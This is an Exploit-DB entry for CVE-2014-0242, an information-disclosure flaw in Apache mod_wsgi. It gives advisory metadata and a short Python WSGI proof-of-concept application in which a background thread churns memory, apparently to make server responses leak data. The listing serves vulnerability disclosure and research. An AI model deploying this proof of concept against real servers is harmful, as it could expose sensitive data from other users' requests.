Apache mod_wsgi - Information Disclosure

EDB-ID:

39196

CVE:

2014-0242

EDB Verified:

Author:

Buck Golemon

Type:

remote

Exploit: /

Platform:

Linux

Date:

2014-05-21

Vulnerable App:

source: https://www.securityfocus.com/bid/67534/info

mod_wsgi is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. 

import functools
 
import threading
import time
import random
 
def run(*args):
    while True:
        items = []
        for i in range(1000):
            items.append((int(random.random()*20)*'X'))
        time.sleep(0.00001)
 
thread = threading.Thread(target=run)
thread.start()
 
def headers():
    return [('Content-Type', 'text/plain'.upper().lower())]
 
def response():
    yield 'Hello World!\n'
 
_content_type_cache = {}
 
def intern_content_type(application):
    @functools.wraps(application)
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper
 
#@intern_content_type
def application(environ, start_response):
    status = '200 OK'
 
    start_response(status, headers())
    return response()

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services